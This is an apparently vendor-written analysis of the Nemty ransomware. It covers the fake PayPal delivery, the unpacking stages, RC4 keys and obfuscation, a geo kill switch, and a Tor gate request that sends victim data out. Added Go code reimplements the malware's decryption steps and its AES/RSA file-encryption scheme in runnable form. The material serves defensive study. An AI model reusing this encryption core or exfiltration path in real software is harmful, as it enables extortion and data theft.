Meet the Nemty ransomware from the fake PayPal site

Tomcat

A new ransomware called Nemty has appeared, believed to be a successor to GandCrab or Buran. It is distributed mainly through a fake PayPal website and has a number of interesting features. Details of how it works follow below.

Nemty was first reported by the researcher nao_sec on September 7, 2019. The malware was distributed through a site posing as PayPal; delivery through the RIG exploit kit has also been observed. The attackers used social engineering to get the victim to run a file named cashback.exe, supposedly received from PayPal. Curiously, Nemty uses the wrong port for the local Tor proxy service, which prevents it from sending its data to the attackers' server. A victim who intends to pay therefore has to upload the encrypted data to the Tor decryption service himself and wait for the attackers to decrypt it.

Several facts about Nemty suggest that it was developed by the same people, or by criminals associated with, the authors of Buran and GandCrab.
  • Like GandCrab, Nemty has an Easter egg: a link to a photo of Russian President Vladimir Putin with an obscene caption. The older GandCrab ransomware carried an image with the same text.
  • Language artifacts in both programs point to the same Russian-speaking authors.
  • It is the first ransomware to use an 8192-bit RSA key. The size is pointless: 2048-bit RSA is already far beyond any practical factoring attack, so the extra bits buy nothing except slower key operations.
  • Like Buran, the core of the ransomware is written in Object Pascal and compiled with Borland Delphi.

Static analysis

Execution of the malicious code occurs in four stages. The first is cashback.exe, a 1,198,936-byte PE32 executable for Windows. It was written in Visual C++ and its header timestamp says it was compiled on October 14, 2013. It carries a .cab archive that is unpacked automatically when cashback.exe runs; the unpacking uses the Cabinet.dll library (FDICreate(), FDIDestroy() and related functions) to extract the files from the archive.

image


image


SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC

After unpacking the archive, three files will appear.

image


Next, temp.exe is launched: a 307,200-byte PE32 executable for Windows, written in Visual C++ and packed with the MPRESS packer (a packer similar to UPX).

image


SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD

The next stage is ironman.exe. When temp.exe runs, it decrypts the embedded data file temp and writes the result out as ironman.exe, a 544,768-byte PE32 executable compiled with Borland Delphi.

image


SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88

The final stage is a relaunch of ironman.exe. At runtime it transforms its own code and runs the result from memory; this in-memory version is the malicious component responsible for encryption.

Attack vector

Currently, the Nemty ransomware is distributed through the website pp-back.info.

image


The complete infection chain can be viewed in the app.any.run sandbox.

Installation

cashback.exe is the start of the attack. As noted above, it unpacks the .cab archive it carries. It then creates a temporary folder (TMP4351$.TMP in this run) of the form %TEMP%\IXPxxx.TMP, where xxx is a number from 001 to 999. The folder name and the cleanup key below are the standard artifacts of a Windows wextract/IExpress self-extracting package.

image


image


Next, a RunOnce registry value is created that looks like this:

[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
wextract_cleanup0 = rundll32.exe "C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\MALWAR~1\AppData\Local\Temp\IXPxxx.TMP\""

It removes the unpacked files at the next logon (DelNodeRunDLL32 in advpack.dll deletes a directory tree). Finally, cashback.exe starts the temp.exe process.

image


temp.exe is the second step in the infection chain.

It is the process launched by cashback.exe. It tries to download AutoHotkey, a scripting tool for Windows, and to run the WindowSpy.ahk script stored in the resource section of the PE file.

image


The WindowSpy.ahk script decrypts the temp file into ironman.exe using RC4 with the password IwantAcake; the RC4 key is the MD5 hash of that password.

temp.exe then calls the ironman.exe process.

image


Ironman.exe - third step

ironman.exe reads the contents of iron.bmp and writes iron.txt, which contains the encryptor that will be launched next.

image


image


The malware then loads iron.txt into memory and relaunches it as ironman.exe, after which iron.txt is deleted.

This relaunched ironman.exe is the main part of the NEMTY ransomware and encrypts the files on the infected computer. It creates a mutex named hate.

image


The first thing it does is determine the computer's geographic location. Nemty queries http://api.ipify.org for the public IP address, then looks up the country for that IP at api.db-ip.com/v2/free/[IP]/countryName. If the computer is located in one of the regions below, execution stops:
  • Russia
  • Belarus
  • Ukraine
  • Kazakhstan
  • Tajikistan

Most likely the developers do not want to attract the attention of law enforcement in their home countries, so they do not encrypt files in those jurisdictions.

If the victim's IP address does not resolve to one of those countries, the malware encrypts the user's files.
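The lookup sequence above, as an added example written in Go (not code from the analysis). It assumes https for the db-ip endpoint, that db-ip returns plain English country names such as "Russia", and that a failed lookup counts as "not excluded"; none of that is stated on the page. The canned answers are constructed. Its practical use is on the analyst's side: a sandbox that answers the two requests with an excluded country makes the sample stop before it encrypts anything, while a sandbox with no network at all does not trigger the check.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"strings"
)

// Endpoints named in the text: the public IP first, then the country for that IP.
const ipifyURL = "http://api.ipify.org"

func dbipURL(ip string) string {
	return "https://api.db-ip.com/v2/free/" + ip + "/countryName" // https is an assumption
}

// excludedCountries is the list from the text. That db-ip returns exactly
// these English names is an assumption.
var excludedCountries = map[string]bool{
	"Russia": true, "Belarus": true, "Ukraine": true, "Kazakhstan": true, "Tajikistan": true,
}

// fetchFunc abstracts the HTTP GET so the same check can run against the live
// endpoints or against canned answers, as a sandbox would supply them.
type fetchFunc func(url string) (string, error)

// httpFetch is the live variant (not used in main, which stays offline).
func httpFetch(client *http.Client) fetchFunc {
	return func(url string) (string, error) {
		resp, err := client.Get(url)
		if err != nil {
			return "", err
		}
		defer resp.Body.Close()
		body, err := io.ReadAll(resp.Body)
		return string(body), err
	}
}

// cannedFetch answers from a map and fails for anything else, which is how an
// isolated sandbox without real network access looks to the malware.
func cannedFetch(answers map[string]string) fetchFunc {
	return func(url string) (string, error) {
		if body, ok := answers[url]; ok {
			return body, nil
		}
		return "", fmt.Errorf("no route to %s", url)
	}
}

// lookupCountry performs the two-step lookup and returns the IP and country.
func lookupCountry(fetch fetchFunc) (ip, country string, err error) {
	if ip, err = fetch(ipifyURL); err != nil {
		return "", "", err
	}
	ip = strings.TrimSpace(ip)
	if country, err = fetch(dbipURL(ip)); err != nil {
		return ip, "", err
	}
	return ip, strings.TrimSpace(country), nil
}

// shouldAbort reports whether the geo kill switch fires. It fires only on a
// successful lookup naming an excluded country; what Nemty does when the
// lookup fails is not stated on the page, so treating failure as "not
// excluded" is an assumption of this model.
func shouldAbort(fetch fetchFunc) bool {
	_, country, err := lookupCountry(fetch)
	return err == nil && excludedCountries[country]
}

func main() {
	// Constructed sandbox answers (documentation IP ranges): steer the sample
	// by returning an excluded country.
	ru := cannedFetch(map[string]string{
		ipifyURL:               "203.0.113.7\n",
		dbipURL("203.0.113.7"): "Russia",
	})
	de := cannedFetch(map[string]string{
		ipifyURL:                "198.51.100.9",
		dbipURL("198.51.100.9"): "Germany",
	})
	fmt.Println("excluded country -> abort:", shouldAbort(ru))               // true
	fmt.Println("other country    -> abort:", shouldAbort(de))               // false
	fmt.Println("no network       -> abort:", shouldAbort(cannedFetch(nil))) // false
}
```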

image


To hinder recovery, volume shadow copies are deleted:

image


It then builds a list of files and folders that will not be encrypted, together with a list of excluded file extensions and names:
  • windows
  • $RECYCLE.BIN
  • rsa
  • NTDETECT.COM
  • ntldr
  • MSDOS.SYS
  • IO.SYS
  • boot.ini
  • AUTOEXEC.BAT
  • ntuser.dat
  • desktop.ini
  • CONFIG.SYS
  • BOOTSECT.BAK
  • bootmgr
  • programdata
  • appdata
  • osoft
  • Common Files

Excluded extensions and names: log LOG CAB cab CMD cmd COM com cpl CPL exe EXE ini INI dll DDL lnk LNK url URL ttf TTF DECRYPT.txt NEMTY

Obfuscation

To hide URLs and embedded configuration data, Nemty stores them base64-encoded and RC4-encrypted with the key fuckav.

image


Decoding uses CryptStringToBinary() for the base64 step, followed by RC4:

image
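The two RC4 uses on this page, the stage-2 payload key (MD5 of the password IwantAcake, described under temp.exe) and the string obfuscation here (base64, then RC4 with fuckav), share one cipher, so here is one added example covering both. It is not code from the original analysis; it is written in Go against the standard library, checks the RC4 implementation against the public "Key"/"Plaintext" test vector, and the input blobs are constructed. The page gives only the keyword fuckav, so using its raw bytes as the RC4 key (no MD5 step) is an assumption, as is standard base64 with padding.

```go
package main

import (
	"crypto/md5"
	"crypto/rc4"
	"encoding/base64"
	"encoding/hex"
	"fmt"
)

// rc4Apply runs RC4 over data with the given key. RC4 is symmetric, so the
// same call both encrypts and decrypts.
func rc4Apply(key, data []byte) ([]byte, error) {
	c, err := rc4.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(data))
	c.XORKeyStream(out, data)
	return out, nil
}

// ironmanKey derives the RC4 key the WindowSpy.ahk stage uses: the 16-byte
// MD5 digest of the password "IwantAcake".
func ironmanKey() []byte {
	sum := md5.Sum([]byte("IwantAcake"))
	return sum[:]
}

// decryptIronman turns the dropped "temp" blob into the ironman.exe bytes.
func decryptIronman(blob []byte) ([]byte, error) {
	return rc4Apply(ironmanKey(), blob)
}

// decodeConfigString reverses the string obfuscation of the encryption stage:
// base64 decode, then RC4 with the key "fuckav". Using the raw keyword bytes
// as the key (no hashing) is an assumption; the page names only the keyword.
func decodeConfigString(encoded string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return "", err
	}
	plain, err := rc4Apply([]byte("fuckav"), raw)
	if err != nil {
		return "", err
	}
	return string(plain), nil
}

// encodeConfigString is the forward direction, used here only to build a
// constructed sample; the malware ships its strings already encoded.
func encodeConfigString(plain string) (string, error) {
	enc, err := rc4Apply([]byte("fuckav"), []byte(plain))
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(enc), nil
}

func main() {
	// Sanity check against the public RC4 test vector (key "Key", "Plaintext").
	ct, _ := rc4Apply([]byte("Key"), []byte("Plaintext"))
	fmt.Println("rc4 vector:", hex.EncodeToString(ct)) // bbf316e8d940af0ad3

	// Constructed sample: an obfuscated URL as it would sit in the .data section.
	sample, _ := encodeConfigString("http://api.ipify.org")
	fmt.Println("encoded:", sample)
	decoded, _ := decodeConfigString(sample)
	fmt.Println("decoded:", decoded)

	// Stage-2 payload decryption on a constructed "temp" blob (not a real PE).
	fake, _ := rc4Apply(ironmanKey(), []byte("MZ...constructed"))
	exe, _ := decryptIronman(fake)
	fmt.Printf("ironman.exe starts with %q\n", exe[:2])
}
```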


Encryption

Nemty uses three layers of encryption:
  • AES-128-CBC for file contents. The 128-bit AES key is generated at random once and the same key is used for every file; it is stored in the configuration file on the victim's computer. The IV is generated at random for each file and stored in the encrypted file.
  • RSA-2048 for the per-file IV. A session key pair is generated; the session private key is stored in the configuration file on the victim's computer.
  • RSA-8192. The master public key is embedded in the program and is used to encrypt the configuration file, which holds the AES key and the RSA-2048 session private key.

Nemty first generates 32 bytes of random data; the first 16 bytes are used as the AES-128-CBC key.

image


The second algorithm is RSA-2048. The key pair is generated with CryptGenKey() and imported with CryptImportKey().

image


Once the session key pair is generated, the public key is imported into the Microsoft Cryptographic Service Provider (CSP).

image


An example of a generated public key for a session:

image


Next, the private key is imported into the CSP.

image


An example of a generated private key for a session:

image


Last comes RSA-8192. The master public key is stored in encrypted form (base64 + RC4) in the .data section of the PE file.

image


After base64 decoding and RC4 decryption with the key fuckav, the RSA-8192 key looks like this:

image


The whole encryption process is therefore:
  • Generate the 128-bit AES key that will encrypt all files.
  • Generate an IV for each file.
  • Generate the RSA-2048 session key pair.
  • Decode the embedded RSA-8192 master public key (base64 + RC4).
  • Encrypt each file's contents with AES-128-CBC under the key from the first step.
  • Encrypt the file's IV with the RSA-2048 session public key and base64-encode it.
  • Append the encrypted IV to the end of each encrypted file.
  • Write the AES key and the RSA-2048 session private key into the configuration.
  • Encrypt the configuration data (described under Collecting information about the infected computer) with the RSA-8192 master public key.

Example of encrypted files:
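The scheme above, modelled end to end as an added example in Go against the standard library. This is not Nemty's code and not a decryptor for real samples; it exists to show why, with this design, the master private key is the single secret the victim cannot obtain. Assumptions beyond what the page states: PKCS#7 padding for AES-CBC, PKCS#1 v1.5 for both RSA layers, the configuration sealed as the AES key followed by the PKCS#1 DER of the session private key and split into RSA-block-sized pieces (the page only says the configuration is encrypted with the master key), a fixed-width base64 trailer for the encrypted IV, and a 2048-bit master key in place of 8192 so it runs in seconds. The sample document is constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"encoding/base64"
	"fmt"
)

// masterKeyBits: Nemty embeds an RSA-8192 master key; 2048 is used here only so the demo runs in seconds.
const masterKeyBits = 2048

func must(err error) {
	if err != nil {
		panic(err)
	}
}

// newSession: 32 random bytes, of which the first 16 become the AES-128 key
// shared by all files ("key"), plus a fresh RSA-2048 session pair ("pr_key").
func newSession() ([]byte, *rsa.PrivateKey) {
	seed := make([]byte, 32)
	_, err := rand.Read(seed)
	must(err)
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	must(err)
	return seed[:16], priv
}

// encryptFile: AES-128-CBC with a per-file IV (PKCS#7 padding assumed; the page does not
// say), then the IV RSA-encrypted with the session public key, base64-encoded and appended.
func encryptFile(aesKey []byte, pub *rsa.PublicKey, plaintext []byte) []byte {
	n := aes.BlockSize - len(plaintext)%aes.BlockSize
	buf := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	iv := make([]byte, aes.BlockSize)
	_, err := rand.Read(iv)
	must(err)
	blk, err := aes.NewCipher(aesKey)
	must(err)
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(buf, buf) // in place
	encIV, err := rsa.EncryptPKCS1v15(rand.Reader, pub, iv)
	must(err)
	return append(buf, base64.StdEncoding.EncodeToString(encIV)...)
}

// sealConfig: master-encrypts key || PKCS#1 DER(pr_key). That exceeds one RSA block, so it is
// split into size-11 byte pieces (PKCS#1 v1.5 limit); how Nemty splits its config is not stated.
func sealConfig(aesKey []byte, priv *rsa.PrivateKey, master *rsa.PublicKey) []byte {
	cfg := append(append([]byte{}, aesKey...), x509.MarshalPKCS1PrivateKey(priv)...)
	var out []byte
	for step := master.Size() - 11; len(cfg) > 0; cfg = cfg[step:] {
		if step > len(cfg) {
			step = len(cfg)
		}
		c, err := rsa.EncryptPKCS1v15(rand.Reader, master, cfg[:step])
		must(err)
		out = append(out, c...)
	}
	return out
}

// openConfig (attacker side): only the master private key recovers key and pr_key.
func openConfig(master *rsa.PrivateKey, sealed []byte) ([]byte, *rsa.PrivateKey) {
	var cfg []byte
	for i := 0; i < len(sealed); i += master.Size() {
		p, err := rsa.DecryptPKCS1v15(rand.Reader, master, sealed[i:i+master.Size()])
		must(err)
		cfg = append(cfg, p...)
	}
	priv, err := x509.ParsePKCS1PrivateKey(cfg[16:])
	must(err)
	return cfg[:16], priv
}

// decryptFile: split off the base64 trailer, RSA-decrypt the IV, AES-CBC-decrypt, strip padding.
func decryptFile(aesKey []byte, priv *rsa.PrivateKey, blob []byte) []byte {
	cut := len(blob) - base64.StdEncoding.EncodedLen(priv.Size())
	encIV, err := base64.StdEncoding.DecodeString(string(blob[cut:]))
	must(err)
	iv, err := rsa.DecryptPKCS1v15(rand.Reader, priv, encIV)
	must(err)
	blk, err := aes.NewCipher(aesKey)
	must(err)
	pt := make([]byte, cut)
	cipher.NewCBCDecrypter(blk, iv).CryptBlocks(pt, blob[:cut])
	return pt[:len(pt)-int(pt[len(pt)-1])]
}

func main() {
	master, _ := rsa.GenerateKey(rand.Reader, masterKeyBits)
	key, priv := newSession()
	enc := encryptFile(key, &priv.PublicKey, []byte("constructed victim document"))
	k2, p2 := openConfig(master, sealConfig(key, priv, &master.PublicKey))
	fmt.Printf("recovered: %q\n", decryptFile(k2, p2, enc))
}
```

Two properties of the design are visible in the code: encrypting the same document twice yields different ciphertext because the IV is fresh per file, and everything a decryptor needs (the AES key and the session private key) sits in the sealed configuration, so the victim's only route to it is the holder of the master private key.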

Collecting information about the infected computer

The ransomware collects the keys needed to decrypt the files, so the attacker can build a decryptor for this victim. In addition, Nemty collects user data such as the username, computer name and hardware profile.

image


It calls the GetLogicalDrives(), GetFreeSpace(), GetDriveType() functions to collect information about the drives of the infected computer.

The collected information is stored in the configuration file. Decoding the string gives the list of configuration parameters:

image


Example configuration of an infected computer:

image


The configuration template can be represented as follows:

{"General": {"IP":"[IP]", "Country":"[Country]", "ComputerName":"[ComputerName]", "Username":"[Username]", "OS":"[OS]", "isRU":false, "version":"1.4", "CompID":"{[CompID]}", "FileID":"_NEMTY_[FileID]_", "UserID":"[UserID]", "key":"[key]", "pr_key":"[pr_key]

Nemty stores the collected data in JSON format in a .nemty file in the user's profile directory (%USER%\_NEMTY_.nemty as reported). The FileID is a randomly generated 7-character string; for example, _NEMTY_tgdLYrd_.nemty. The FileID is also appended to the name of each encrypted file.

Ransom message

After encrypting the files, a ransom note _NEMTY_[FileID]-DECRYPT.txt appears on the desktop with the following content:

image


At the end of the note is the encrypted information about the infected computer.

image


Network communication

The ironman.exe process downloads the Tor package from https://dist.torproject.org/torbrowser/8.5.4/tor-win32-0.4.0.5.zip (the Expert Bundle, i.e. the standalone tor daemon rather than the full Tor Browser) and tries to install it.

Nemty then tries to send the configuration data through a local SOCKS proxy at 127.0.0.1:9050, where it expects the Tor Browser's proxy to be listening. The Tor Browser, however, exposes its proxy on port 9150; 9050 is the default SOCKS port of a standalone tor daemon (the Linux package or the Windows Expert Bundle). In the analysed run nothing was listening there, so no data reached the attackers' server. The victim can instead upload the configuration manually on the Tor decryption service linked in the ransom note. One caveat for anyone relying on this failure: if a standalone tor daemon does happen to be listening on 9050 (the bundle downloaded above would provide one if its installation succeeded), the same request would go through.

Connecting to Tor proxy:

image

image


The configuration is submitted as an HTTP GET request to 127.0.0.1:9050/public/gate?data=

image


Here you can see the open TCP ports used by the local Tor proxy:

image


Nemty decryption service on the Tor network:

image


You can upload an encrypted photo (jpg, png, bmp) to test the decryption service.

image


The service then demands the ransom; if it is not paid, the price is doubled.

image


Conclusion

At the moment there is no way to decrypt files encrypted by Nemty without paying the ransom. This version shares traits with the Buran ransomware and the retired GandCrab: compilation with Borland Delphi and an image with the same text. It is also the first encryptor to use an 8192-bit RSA key, which, again, makes no sense, since 2048-bit RSA is already secure against any practical attack. Finally, and curiously, it tries to use the wrong port for the local Tor proxy service.

However, Acronis Backup and Acronis True Image solutions prevent Nemty ransomware from reaching users' PCs and data, and providers can protect their customers using Acronis Backup Cloud. Complete Cyber Protection provides not only backup, but also protection using Acronis Active Protection, a technology based on artificial intelligence and behavioral heuristics that allows you to neutralize even as yet unknown malware.
 